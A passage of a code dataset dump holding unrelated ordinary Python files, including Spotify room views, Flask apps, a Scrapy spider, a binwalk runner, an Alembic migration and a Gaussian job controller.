user-read-currently-playing'\n url = Request('GET', 'https://accounts.spotify.com/authorize', params={\n 'scope': scopes,\n 'response_type': 'code',\n 'redirect_uri': REDIRECT_URI,\n 'client_id': CLIENT_ID\n }).prepare().url\n\n return Response({\"url\": url}, status = status.HTTP_200_OK)\n\ndef spotifyCallBack(request, fromat = None):\n code = request.GET.get('code')\n err = request.GET.get('error')\n response = post('https://accounts.spotify.com/api/token', data={\n 'grant_type':'authorization_code',\n 'code': code,\n 'redirect_uri': REDIRECT_URI,\n 'client_id':CLIENT_ID,\n 'client_secret':CLIENT_SECRET\n\n }).json()\n\n access_token = response.get('access_token')\n token_type = response.get('token_type')\n refresh_token = response.get('refresh_token')\n expires_in = response.get('expires_in')\n error = response.get('error')\n if not request.session.exists(request.session.session_key):\n request.session.create()\n update_or_create_tokens(request.session.session_key, access_token, refresh_token, token_type, expires_in)\n return redirect('frontend:')\n\nclass IsAuthenticated(APIView):\n def get(self, request, format=None):\n is_authenticated = check_authentication(self.request.session.session_key)\n return Response({'status':is_authenticated},status=status.HTTP_200_OK)\n\nclass currentSong(APIView):\n def update_room_song(self, room, song_id):\n current_song = 
room.current_song\n if current_song != song_id:\n room.current_song = song_id\n room.save(update_fields = ['current_song'])\n Vote.objects.filter(room = room).delete()\n\n def get(self, request, format=None):\n roomCode = self.request.session.get('room-code')\n room = Room.objects.filter(code=roomCode)\n if len(room)>0:\n room = room[0]\n else:\n return Response({\"Error\": \"not in a room\"}, status=status.HTTP_404_NOT_FOUND)\n host = room.host\n endpoint = 'player/currently-playing'\n response = exexute_spotify_api_call(host, endpoint)\n if 'error' in response or 'item' not in response:\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n item = response.get('item')\n duration = item.get('duration_ms')\n progress = response.get('progress_ms')\n album_cover = item.get('album').get('images')[0].get('url')\n is_playing = response.get('is_playing')\n song_id = item.get('id')\n artists = \"\"\n\n for i, artist in enumerate(item.get('album').get('artists')):\n if i > 0:\n artists += \", \"\n name = artist.get('name')\n artists+=name\n votes = len(Vote.objects.filter(room = room, song_id=song_id))\n song = {\n 'title': item.get('name'),\n 'artist': artists,\n 'duration': duration,\n 'time': progress,\n 'img_url': album_cover,\n 'is_playing': is_playing,\n 'votes':votes,\n 'votes_needed': room.votes_to_skip,\n 'id': song_id\n }\n self.update_room_song(room, song_id)\n return Response(song, status=status.HTTP_200_OK)\n\nclass PauseSong(APIView):\n def put(self, request, format=None):\n room_code = self.request.session.get('room-code')\n room = Room.objects.filter(code=room_code)[0]\n if self.request.session.session_key == room.host or room.guest_can_pause:\n response = pause_song(room.host)\n if 'error' in response:\n return Response({'error': response['error']['message']}, status=status.HTTP_403_FORBIDDEN)\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n return Response({}, status=status.HTTP_403_FORBIDDEN)\n\nclass PlaySong(APIView):\n def put(self, request, format=None):\n room_code = self.request.session.get('room-code')\n room = Room.objects.filter(code=room_code)[0]\n if self.request.session.session_key == room.host or room.guest_can_pause:\n response = play_song(room.host)\n if 'error' in response:\n return Response({'error': response['error']['message']}, status=status.HTTP_403_FORBIDDEN)\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n return Response({}, status=status.HTTP_403_FORBIDDEN)\n\nclass SkipSong(APIView):\n def post(self, request, format= None):\n room_code= self.request.session.get('room-code')\n room = Room.objects.filter(code=room_code)[0]\n votes = Vote.objects.filter(room = room, song_id=room.current_song)\n votes_needed = room.votes_to_skip\n if self.request.session.session_key == room.host or len(votes)+1>=votes_needed:\n votes.delete()\n response = skip_song(room.host)\n if 'error' in response:\n return Response({'error': response['error']['message']}, status=status.HTTP_403_FORBIDDEN)\n else:\n vote = Vote(user=self.request.session.session_key, room = room , song_id= room.current_song)\n vote.save()\n\n return Response({}, status=status.HTTP_403_FORBIDDEN)","sub_path":"spotify/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"124586165","text":"#David Xiedeng\n#SoftDev1 pd 1\n#K<n> -- <Title/Topic/Summary>\n#2019-09-<dd> \n\nfrom flask import Flask, render_template\napp = Flask(__name__) #create instance of class 
Flask\n\n@app.route(\"/\")\n #assign following fxn to run when root route requested\ndef hello_world():\n print(__name__) #where will this go?\n return \"No hablo queso!\"\n\ncoll = {0,1,2,3}\n\n@app.route(\"/my_foist_template\")\ndef test_tmplt():\n return render_template(\n 'model_tmplt.html',\n foo=\"foooo\",\n collection=coll\n )\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()\n","sub_path":"fall/09_stat/flaskApp.py","file_name":"flaskApp.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"450374502","text":"# --------------------------------------------------------------------------- #\n# Copyright (c) William Moreno Reyes <williamjmorenor at gmail.com> #\n# This file is part of expresoERP and is distributed under the MIT License. #\n# See LICENSE file or copy at http://opensource.org/licenses/MIT #\n# --------------------------------------------------------------------------- #\n\n\"\"\"Default theme for expreso ERP Workstation.\"\"\"\n\n# Standard library imports:\nfrom os.path import dirname, realpath, join\n\n# Third party libraries imports:\n\n# Local imports:\n\n# <-------------------------------------------------------------------------> #\n# System wide definitions:\n__title__ = \"eERP-theme-default\"\n__version__ = \"0.1.0rc11\"\n__license__ = \"MIT License\"\n__copyright__ = \"Copyright (c) 2016 William Moreno Reyes\"\n__summary__ = \"Accounting system for SMEs\"\n__uri__ = \"expresoerp.github.io\"\n__author__ = \"William Moreno Reyes\"\n__email__ = \"williamjmorenor at gmail.com\"\n\n# <-------------------------------------------------------------------------> #\n# Define local path:\n__here__ = dirname(realpath(__file__))\n\n# <-------------------------------------------------------------------------> #\n# Define theme here:\ntheme = {\n \"database-setup\": join(__here__, \"artwork/database.png\"),\n \"login-icon\": join(__here__, \"artwork/secure-server.png\"),\n \"mariabd\": join(__here__, \"artwork/mariadb.png\"),\n \"postgresql\": join(__here__, \"artwork/postgresql.png\"),\n \"sqlite\": join(__here__, \"artwork/sqlite.png\"),\n \"sql-server\": join(__here__, \"artwork/sqlserver.png\"),\n \"wizard-banner\": join(__here__, \"artwork/wizard_banner.jpg\"),\n \"wizard-top\": join(__here__, \"artwork/wizard_top.png\")\n}\n","sub_path":"default/build/lib/eERP_theme_default/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"381662402","text":"# coding=utf-8\nfrom flask import Flask\nfrom .database import db, models\nfrom . 
import routes\n\n\ndef create_app(config_filename=None):\n    app = Flask(__name__)\n    if config_filename is not None:\n        app.config.from_pyfile(config_filename)  # load the configuration file\n    configure_database(app)  # initialize the database\n    routes.init(app)  # initialize routes, global interceptors and blueprint loading\n\n    return app\n\n\ndef configure_database(app):\n    db.app = app\n    db.init_app(app)\n    models.init(db)  # create the database tables\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"176353273","text":"class Solution(object):\n    def twoSum(self, nums, target):\n        \"\"\"\n        :type nums: List[int]\n        :type target: int\n        :rtype: List[int]\n        \"\"\"\n        for i in range(len(nums)):\n            if (target - nums[i]) in nums:\n                index = nums.index(target - nums[i])\n                if i != index:\n                    if i < index:\n                        return [i + 1, index + 1]\n                    else:\n                        return [index + 1, i + 1]\n\n        else:\n            raise Exception(\"No Solution!\")\n\n\nnumbers = [2, 7, 11, 15]\ntarget = 9\nso = Solution()\nprint(so.twoSum(numbers, target))\n","sub_path":"Python/TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"451641636","text":"import scrapy\n\nfrom ..items import ItArticle\n\nclass TestSpider(scrapy.Spider):\n    name = 'test7'\n    allowed_domains = ['computerworld.com']\n    start_urls = ['https://www.computerworld.com/news/']\n\n    def parse(self, response):\n        \"\"\"\n        :param : response\n        :return : Request\n        \"\"\"\n        for url in response.css('div.post-cont h3 > a::attr(\"href\")').extract():\n            self.logger.info('Response URL : %s' % response.urljoin(url))\n            yield scrapy.Request('https://www.computerworld.com'+str(url), self.parse_article, dont_filter=True)\n\n\n    def parse_article(self, response):\n        \"\"\"\n        :param : response\n        :return : items\n        \"\"\"\n        print(\">>>>>>>>>>\", response)\n        item = ItArticle()\n        item['title'] = response.xpath('//h1[@itemprop=\"headline\"]/text()').get()\n        item['img_url'] = response.xpath('//figure[@itemprop=\"image\"]/img[@itemprop=\"contentUrl\"]/@data-original').get()\n        item['contents'] = ''.join(response.xpath('//div[@itemprop=\"articleBody\"]/p/text()').getall())\n\n        print(\"=======================\")\n        print(dict(item))\n        print(\"=======================\")\n\n\n        yield item","sub_path":"crawling/scrapy/section03_05/section03_05/spiders/class03_5.py","file_name":"class03_5.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"363455118","text":"#!/usr/bin/python3\n# -*- encoding: utf-8 -*-\n\nimport json\nimport os\nfrom threading import Thread\nimport time\nfrom filelock import FileLock\nfrom utils import cmd_exec\nfrom config import DELAY_CHECK, UPLOAD_FOLDER\n\nRUNNING = []\n\nclass Binwalk(Thread):\n\n    def __init__(self, folder, config):\n        Thread.__init__(self)\n        self.folder = folder\n        self.config = config\n\n    def set_config_status(self, status):\n        with FileLock(f\"{self.folder}/config.json.lock\"):\n            with open(f\"{self.folder}/config.json\", \"r\") as jsonFile:\n                config = json.load(jsonFile)\n            config[\"status\"][\"binwalk\"] = status\n            with open(f\"{self.folder}/config.json\", \"w\") as jsonFile:\n                json.dump(config, jsonFile)\n\n    def run(self):\n        self.set_config_status(\"running\")\n        # First check whether results were already computed for the original image\n        md5_image = self.config[\"md5_image\"]\n        if self.config[\"md5_image\"] != 
self.config[\"md5_full\"] \\\n and os.path.isfile(f\"{UPLOAD_FOLDER}/{md5_image}/binwalk.7z\") \\\n and os.path.isfile(f\"{UPLOAD_FOLDER}/{md5_image}/binwalk.txt\") :\n cmd_exec(f\"cp {UPLOAD_FOLDER}/{md5_image}/binwalk.7z {self.folder}/binwalk.7z\")\n cmd_exec(f\"cp {UPLOAD_FOLDER}/{md5_image}/binwalk.txt {self.folder}/binwalk.txt\")\n else: # Else compute\n image = self.config[\"image\"]\n c_input = f\"{self.folder}/{image}\" # image.png\n output = cmd_exec(f\"binwalk -e . -C {self.folder}/binwalk --dd='.*' {c_input} --run-as=root 2>&1\")\n cmd_exec(f\"7z a {self.folder}/binwalk.7z {self.folder}/binwalk/*/*\")\n cmd_exec(f\"rm -r {self.folder}/binwalk\")\n with open(f\"{self.folder}/binwalk.txt\", \"w\") as f:\n f.write(output)\n global RUNNING\n RUNNING.remove(self.folder)\n self.set_config_status(\"finished\")\n\nwhile True:\n dirs = os.listdir(UPLOAD_FOLDER)\n for d in dirs:\n try:\n d = f\"{UPLOAD_FOLDER}/{d}\"\n if d in RUNNING or not os.path.isdir(d) or not os.path.isfile(f\"{d}/config.json\"):\n continue\n with open(f\"{d}/config.json\", \"r\") as jsonFile:\n config = json.load(jsonFile)\n if \"binwalk\" not in config[\"status\"]:\n RUNNING.append(d)\n Binwalk(d, config).start() # Run binwalk on folder\n except:\n continue\n time.sleep(DELAY_CHECK)\n","sub_path":"backend/binwalk.py","file_name":"binwalk.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"441427922","text":"\"\"\"removed project_id fk from Upload model\n\nRevision ID: 0bf9f0276ff8\nRevises: ba8709fd7e32\nCreate Date: 2017-03-21 18:43:46.613183\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0bf9f0276ff8'\ndown_revision = 'ba8709fd7e32'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(u'upload_project_id_fkey', 'upload', type_='foreignkey')\n op.drop_column('upload', 'project_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
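(note: this re-adds the dropped column and foreign key, but the data removed by the upgrade cannot be restored) 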
###\n    op.add_column('upload', sa.Column('project_id', sa.INTEGER(), autoincrement=False, nullable=True))\n    op.create_foreign_key(u'upload_project_id_fkey', 'upload', 'project', ['project_id'], ['id'])\n    # ### end Alembic commands ###\n","sub_path":"alembic/versions/0bf9f0276ff8_removed_project_id_fk_from_upload_model.py","file_name":"0bf9f0276ff8_removed_project_id_fk_from_upload_model.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"619964137","text":"import os\nimport re\nimport shutil\nfrom time import sleep\n\n\nclass GaussianJobControl():\n\n    def __init__(self,cores,cpu_cores,user,root_dir,gdb,gdb_done,gdb_error,molsfile_dir):\n        '''\n        initialise the job controller\n        self.cores: the number of CPU cores that every job uses\n        self.cpu_cores: the maximum number of CPU cores the machine has, or the job limit the user defines\n        self.root_dir: the dir that contains the gdb dir, gdb_done dir, gdb_error dir and molsfile_dir\n        self.gdb: dir containing the jobs that are currently being calculated\n        self.gdb_done: dir containing the jobs that have finished\n        self.gdb_error: dir containing the jobs that failed with errors\n        self.molsfile_dir: dir containing all the generated mols files\n        self.user: name of the user who submits the calculation jobs\n        '''\n        self.cores = cores\n        self.cpu_cores = cpu_cores\n        self.root_dir = root_dir\n        self.gdb = gdb\n        self.gdb_done = gdb_done\n        self.gdb_error = gdb_error\n        self.molsfile_dir = molsfile_dir\n        self.user = user\n\n    def __generate_folders(self,molecular_dir):\n        '''\n        generate all the folders needed in the calculation process\n        '''\n        dirs = molecular_dir+'/s0'\n        os.chdir(molecular_dir)\n        if not os.path.exists(dirs):\n            os.mkdir('s0')\n        dirs = molecular_dir+'/s1'\n        if not os.path.exists(dirs):\n            os.mkdir('s1')\n        dirs = molecular_dir+'/t1'\n        if not os.path.exists(dirs):\n            os.mkdir('t1')\n        dirs = molecular_dir+'/nacme'\n        if not os.path.exists(dirs):\n            os.mkdir('nacme')\n        dirs = molecular_dir+'/numfraq'\n        if not os.path.exists(dirs):\n            os.mkdir('numfraq')\n        dirs = molecular_dir+'/optic'\n        if not os.path.exists(dirs):\n            os.mkdir('optic')\n\n        if not os.path.exists(self.molsfile_dir):\n            os.mkdir(self.molsfile_dir)\n\n        if not os.path.exists(self.gdb_done):\n            os.mkdir(self.gdb_done)\n\n        if not os.path.exists(self.gdb_error):\n            os.mkdir(self.gdb_error)\n\n    def __generate_input(self,files,dirs,states):\n        '''\n        the function does the following three steps for a molecule:\n        1. generate the input file needed by the Gaussian software\n        2. generate the PBS file used to submit the calculation job\n        3. 
submit the job\n parameters :\n files represent .xyz file name of a molecular\n dirs represent dir in which different calulation job resided \n states represent different calculation job\n '''\n out_dir = os.path.join(dirs,states)\n g09_parameters = []\n memories = '4'\n temp = files.split('.')\n pbs_name = temp[0]\n input_file = temp[0]+'_'+states+'.com'\n input_pbs = temp[0]+'_'+states+'.pbs'\n out_chk = temp[0]+'_'+states+'.chk'\n out_log = temp[0]+'_'+states+'.log'\n temp = temp[0].split('_')\n molecular = temp[1]\n pp = 'B3LYP'\n if states == 's0':\n compute_para2 = '0 1'\n compute_para1 = '#p opt B3LYP/6-31G* freq'\n if states == 's1':\n compute_para2 = '0 1'\n compute_para1 = '#p opt td B3LYP/6-31G* freq'\n if states == 't1':\n compute_para2 = '0 3'\n compute_para1 = '#p opt B3LYP/6-31G* freq'\n g09_parameters.append(out_chk)\n g09_parameters.append(memories)\n g09_parameters.append(self.cores)\n g09_parameters.append(compute_para1)\n g09_parameters.append(molecular)\n g09_parameters.append(pp)\n g09_parameters.append(compute_para2)\n g09_parameters.append(input_file)\n g09_parameters.append(out_log)\n g09_parameters.append(pbs_name)\n g09_parameters.append(input_pbs)\n \n \n with open(files,'r') as in_object:\n coodinates = []\n while 1:\n line = in_object.readline()\n if not line:\n break\n res = re.match(r'[^0-9]((\\s*)(-*)([0-9]+(\\.+)[0-9]*)(.*)){4}',line)\n if res:\n coodinates.append(line)\n os.chdir(out_dir)\n with open(g09_parameters[7],'w') as out_object:\n out_object.write('%chk='+g09_parameters[0])\n out_object.write('\\n')\n out_object.write('%mem='+g09_parameters[1]+'GB') \n out_object.write('\\n')\n out_object.write('%nprocshared='+g09_parameters[2])\n out_object.write('\\n')\n out_object.write(g09_parameters[3])\n out_object.write('\\n')\n out_object.write('\\n')\n out_object.write(g09_parameters[4]+' optimization with '+g09_parameters[5])\n out_object.write('\\n')\n out_object.write('\\n')\n out_object.write(g09_parameters[6])\n out_object.write('\\n')\n for line in coodinates:\n res = re.match(r'[^0-9]((\\s*)(-*)([0-9]+(\\.+)[0-9]*)(\\s*)){4}',line)\n if res:\n temp = line.split('\\t')\n out_object.write(temp[0])\n out_object.write(' ')\n if float(temp[1]) < 0:\n out_object.write('%.10f' % float(temp[1]))\n else:\n out_object.write(' ')\n out_object.write('%.10f' % float(temp[1]))\n out_object.write(' ')\n if float(temp[2]) < 0:\n out_object.write('%.10f' % float(temp[2]))\n else:\n out_object.write(' ')\n out_object.write('%.10f' % float(temp[2]))\n out_object.write(' ')\n if float(temp[3]) < 0:\n out_object.write('%.10f' % float(temp[3]))\n else:\n out_object.write(' ')\n out_object.write('%.10f' % float(temp[3]))\n out_object.write('\\n')\n else:\n shutil.move(dirs,self.gdb_error)\n return\n out_object.write('\\n')\n with open(g09_parameters[10],'w') as out_object:\n out_object.write('#PBS -S /bin/bash\\n')\n out_object.write('#PBS -N'+' '+g09_parameters[9]+'\\n')\n out_object.write('#PBS -l nodes=1:ppn='+g09_parameters[2]+'\\n')\n out_object.write('#PBS -l walltime=100000:00:00\\n')\n out_object.write('cd $PBS_O_WORKDIR\\n')\n out_object.write('g09 < '+g09_parameters[7]+'>'+g09_parameters[8]+'\\n')\n os.system('qsub '+g09_parameters[10])\n\n def submission_control(self):\n '''\n the fuction controls the submission process\n to ensure that only cpu_cores jobs are submitted\n '''\n joblog = self.root_dir + '/' + 'jobnumber' + '/' + 'job.log'\n for files in os.listdir(self.gdb):\n if os.path.isfile(os.path.join(self.gdb,files)):\n temp = files.split('.')\n 
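# Each .xyz file found in the gdb dir gets its own working directory below;\n                # the s0, s1 and t1 jobs are then submitted one at a time, with the\n                # qstat polling loops waiting for a free queue slot before each submission.\n                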
molecular_dir = os.path.join(self.gdb,temp[0])\n \n os.chdir(self.gdb)\n os.mkdir(molecular_dir)\n shutil.move(files,molecular_dir)\n self.__generate_folders(molecular_dir)\n \n \n while 1:\n a = os.popen('qstat | grep '+self.user+' | wc -l')\n b = int(a.read())\n if b<self.cpu_cores:\n if os.path.exists(molecular_dir):\n os.chdir(molecular_dir)\n self.__generate_input(files,molecular_dir,'s0')\n break\n sleep(30)\n sleep(2)\n \n while 1:\n a = os.popen('qstat | grep '+self.user+' | wc -l')\n b = int(a.read())\n if b<self.cpu_cores:\n if os.path.exists(molecular_dir):\n os.chdir(molecular_dir)\n self.__generate_input(files,molecular_dir,'s1')\n break\n sleep(30)\n sleep(2)\n \n while 1:\n a = os.popen('qstat | grep '+self.user+' | wc -l')\n b = int(a.read())\n if b<self.cpu_cores:\n if os.path.exists(molecular_dir):\n os.chdir(molecular_dir)\n self.__generate_input(files,molecular_dir,'t1')\n break\n sleep(30)\n sleep(2)\n\n def __str_to_13(self,vib):\n num = 13 - len(vib)\n temp = ' '*num\n return temp+vib\n\n def __parse_log_s0(self,fname,outfile,smiles):\n '''\n the function do the follow 2 steps : \n 1. parse the *_s0.log file to obtain different physical and chemical info\n 2. write the info to the *.mols file\n '''\n\n #begin to parse *.com file to obtain atom symbol, atom number and charge of molecular\n \n atom_syb = []\n temp = fname.split('.')\n fname1 = temp[0]+'.com'\n\n with open(fname1,'r') as in_object:\n while 1:\n line = in_object.readline()\n if not line:\n break\n #find charge value in .com file\n res = re.match(r'[0-9]\\s*[0-9]',line) \n if res:\n temp = line.split(' ')\n atom_syb.append(temp[0])\n #find atom symbol in .com file\n res = re.match(r'[^0-9]((\\s*)(-*)([0-9]+(\\.+)[0-9]*)(.*)){3}',line)\n if res:\n temp = line.split(' ')\n atom_syb.append(temp[0])\n charge = atom_syb[0]\n atom_num = len(atom_syb)-1\n #end to parse *.com file\n \n base_name = os.path.basename(fname)\n temp = base_name.split('_')\n molecular = temp[1] #molecular symbol\n number = temp[0] #file number in gdb\n temp = []\n mulliken = []\n atom_pos = []\n atom_mass = []\n frequency = ''\n frequencies = []\n vibration = []\n #varible to store 17 basic properties\n res_list = [] \n #medium varibles\n res_list1 = []\n res_list2 = []\n res_list3 = []\n res_list4 = []\n res_list5 = []\n res_list6 = []\n res_list7 = []\n res_list8 = []\n res_list9 = []\n res_list10 = []\n res_list11 = []\n res_list12 = []\n res_list13 = []\n res_list14 = []\n i = 0\n\n #begin to parse *.log file \n\n with open(fname,'r') as in_object:\n while 1:\n line = in_object.readline()\n if not line:\n break\n res = re.match(r' Rotational constants',line)\n if res:\n res_list1.append(line)\n res = re.match(r' Dipole moment',line)\n if res:\n line = in_object.readline()\n #print line\n res_list2.append(line)\n res = re.match(r' Isotropic polarizability',line)\n if res:\n res_list3.append(line)\n res = re.match(r' Alpha',line)\n if res:\n res_list4.append(line)\n res = re.match(r' Electronic spatial extent',line)\n if res:\n res_list5.append(line)\n res = re.match(r' Zero-point vibrational energy',line)\n if res:\n line = in_object.readline()\n res_list6.append(line)\n res = re.match(r' SCF Done',line)\n if res:\n res_list7.append(line)\n res = re.match(r' Sum of electronic and zero-point Energies',line)\n if res:\n line = in_object.readline()\n res_list8.append(line)\n line = in_object.readline()\n res_list9.append(line)\n line = in_object.readline()\n res_list10.append(line)\n line = in_object.readline()\n line = 
in_object.readline()\n line = in_object.readline()\n line = in_object.readline()\n res_list11.append(line)\n res = re.match(r'.*Standard orientation',line)\n if res:\n line = in_object.readline() \n line = in_object.readline() \n line = in_object.readline() \n line = in_object.readline() \n line = in_object.readline()\n j = 0\n while j < atom_num:\n res_list12.append(line)\n line = in_object.readline()\n j+=1\n res = re.match(r'.*Mulliken charges:',line)\n if res:\n line = in_object.readline()\n res_list13.append(line)\n j = 0\n while j < atom_num:\n res_list13.append(line)\n line = in_object.readline()\n j+=1\n res = re.match(r'.*Frequencies',line)\n if res:\n frequency = ''\n res_list15 = []\n str1 = re.compile(r'-*\\d+\\.\\d+')\n temp = str1.findall(line)\n for i in temp:\n frequency =i+' '+frequency\n #print frequency\n frequencies.append(frequency)\n line = in_object.readline()\n line = in_object.readline()\n line = in_object.readline()\n line = in_object.readline()\n j = 0\n temp_list1 = []\n temp_list2 = []\n temp_list3 = []\n while j < atom_num:\n temp_list = []\n line = in_object.readline()\n str1 = re.compile(r'-*\\d+\\.\\d+')\n temp = str1.findall(line)\n #print temp\n if len(temp)/3 >= 1:\n temp_list.append(temp[0])\n temp_list.append(temp[1])\n temp_list.append(temp[2])\n temp_list1.append(temp_list)\n temp_list = []\n if len(temp)/3 >=2:\n temp_list.append(temp[3])\n temp_list.append(temp[4])\n temp_list.append(temp[5])\n temp_list2.append(temp_list)\n temp_list = []\n if len(temp)/3 ==3:\n temp_list.append(temp[6])\n temp_list.append(temp[7])\n temp_list.append(temp[8])\n temp_list3.append(temp_list)\n j+=1\n if temp_list1:\n vibration.append(temp_list1)\n if temp_list2: \n vibration.append(temp_list2)\n if temp_list3:\n vibration.append(temp_list3)\n #print vibration\n #find atom mass \n res = re.match(r'.*Temperature',line)\n if res:\n j = 0\n while j < atom_num:\n line = in_object.readline()\n res_list14.append(line)\n j+=1\n #end parse *.log file\n\n\n #begin to obtain ground state data from raw data \n\n if res_list12: \n for i in range(atom_num):\n atom_pos.append(res_list12[-1-i])\n\n str1 = re.compile(r'-*\\d+\\.\\d+')\n if res_list1:\n temp = str1.findall(res_list1[-1])\n for i in temp:\n res_list.append(i) #res_list[0],[1],[2] Rotational constant A B C\n if res_list2:\n temp = str1.findall(res_list2[-1])\n res_list.append(temp[-1]) #res_list[3] Dipole moment mu\n if res_list3:\n temp = str1.findall(res_list3[-1])\n res_list.append(temp[-1]) #res_list[4] Isotropic polarizability alpha\n if res_list4:\n temp = str1.findall(res_list4[-4])\n res_list.append(temp[-1]) #res_list[5] homo\n if res_list5:\n temp = str1.findall(res_list4[-3])\n res_list.append(temp[0]) #res_list[6] lomo\n lumo = float(res_list[-1])\n homo = float(res_list[-2])\n res_list.append(lumo-homo) #res_list[7] gap\n if res_list5:\n temp = str1.findall(res_list5[-1])\n res_list.append(temp[-1]) #res_list[8] r2\n if res_list6:\n temp = str1.findall(res_list6[-1])\n temp = float(temp[-1])/627.51\n temp = str(temp)\n res_list.append(temp) #res_list[9] zpve\n if res_list7:\n temp = str1.findall(res_list7[-1])\n res_list.append(temp[-1]) #res_list[10] SCF Done U0\n if res_list8:\n temp = str1.findall(res_list8[-1])\n res_list.append(temp[-1]) #res_list[11] \n if res_list9:\n temp = str1.findall(res_list9[-1])\n res_list.append(temp[-1])\n if res_list10:\n temp = str1.findall(res_list10[-1])\n res_list.append(temp[-1])\n if res_list11:\n temp = str1.findall(res_list11[-1])\n res_list.append(temp[-2])\n if 
res_list13:\n for i in range(atom_num):\n temp = res_list13[-1-i].split(' ')\n mulliken.append(temp[-1])\n if res_list14:\n for i in res_list14:\n temp = i.split(' ')\n atom_mass.append(temp[-1])\n #end obtain ground state data from raw data\n\n\n #begin to write properties to *.mols file\n\n with open(outfile,'w') as out_object:\n out_object.write('------------------------------Chemical Formula and Charge---------------------------------------------------------------\\n')\n out_object.write(' ')\n out_object.write(molecular+\" \"+charge+\"\\n\")\n out_object.write('------------------------------SMILES------------------------------------------------------------------------------------\\n')\n out_object.write(' '+smiles+'\\n')\n out_object.write('------------------------------Basic properties--------------------------------------------------------------------------\\n')\n out_object.write('--tag--index---A---B---C----dipole--isotropic--homo--lumo--gap--r2------zpve--U0--U--H--G--Cv---------------------------\\n')\n out_object.write('--xxx--XXXXXX--GHz-GHz-Ghz--Debye---Bohr^3-----Ha----Ha----Ha---Bohr^2--Ha----Ha--Ha-Ha-Ha-cal/(mol K)------------------\\n')\n out_object.write(' gdb '+number+' ')\n if res_list:\n for i in res_list:\n out_object.write('%.6f' % float(i))\n out_object.write(' ')\n out_object.write('\\n')\n out_object.write('------------------------------Element,XYZ (Angstrom)--------------------------------------------------------------------\\n')\n temp = str(atom_num)\n out_object.write(' '+temp+'\\n')\n str1 = re.compile(r'-*\\d+\\.*\\d*')\n if atom_pos:\n for i in range(atom_num):\n temp = str1.findall(atom_pos[-1-i])\n #print temp\n out_object.write(' '+atom_syb[i+1]+' ')\n if float(temp[3])<0:\n out_object.write('%.6f' % float(temp[3]))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(temp[3]))\n out_object.write(' ')\n if float(temp[4])<0:\n out_object.write('%.6f' % float(temp[4]))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(temp[4]))\n out_object.write(' ')\n if float(temp[5])<0:\n out_object.write('%.6f' % float(temp[5]))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(temp[5]))\n out_object.write(' ')\n out_object.write('\\n')\n out_object.write('------------------------------Mulliken Partial Charge (|e|)-------------------------------------------------------------\\n')\n if mulliken:\n for i in mulliken:\n out_object.write(' ')\n out_object.write('%.6f' % float(i))\n out_object.write(' ')\n out_object.write('\\n')\n out_object.write('------------------------------Atom Mass (Relative atomic mass)----------------------------------------------------------\\n')\n if atom_mass:\n for i in atom_mass:\n out_object.write(' ')\n out_object.write('%.6f' % float(i))\n out_object.write(' ')\n out_object.write('\\n')\n out_object.write('------------------------------Vibration Frequency (cm-1)----------------------------------------------------------------\\n')\n if frequencies:\n for i in frequencies:\n i=i.rstrip()\n temp = i.split(' ')\n for j in temp:\n t1 = '%.6f' % float(j)\n t1=self.__str_to_13(t1)\n out_object.write(' ')\n out_object.write(t1)\n out_object.write(' ')\n out_object.write('\\n')\n out_object.write('------------------------------Vibration Modes---------------------------------------------------------------------------\\n')\n if vibration:\n for i in vibration:\n for j in i:\n out_object.write(' ')\n for k in j:\n if float(k)<0:\n 
out_object.write('%.6f' % float(k))\n out_object.write(' ')\n else:\n out_object.write(' ')\n out_object.write('%.6f' % float(k))\n out_object.write(' ')\n out_object.write('\\n') \n\n #end write properties to *.mols file\n \n def __parse_log_s1t1(self,fname,states,outfile,tokens,note1,note2):\n '''\n the function do the follow 2 steps : \n 1. parse the *_s1.log or *_t1.log file to obtain different physical and chemical info\n 2. write the info to the *.mols file\n '''\n\n #begin to parse *.com file to obtain atom symbol, atom number and charge of molecular\n\n atom_syb = []\n temp = fname.split('.')\n fname1 = temp[0]+'.com'\n with open(fname1,'r') as in_object:\n while 1:\n line = in_object.readline()\n if not line:\n break\n #find charge value in .com file\n res = re.match(r'[0-9]\\s*[0-9]',line) \n if res:\n temp = line.split(' ')\n atom_syb.append(temp[0])\n #find atom symbol in .com file\n res = re.match(r'[^0-9]((\\s*)(-*)([0-9]+(\\.+)[0-9]*)(.*)){3}',line)\n if res:\n temp = line.split(' ')\n atom_syb.append(temp[0])\n charge = atom_syb[0]\n atom_num = len(atom_syb)-1\n\n #end to parse *.com file\n\n atom_pos = []\n res_list1 = []\n res_list2 = []\n res_list3 = []\n with open(fname,'r') as in_object:\n while 1:\n line = in_object.readline()\n if not line:\n 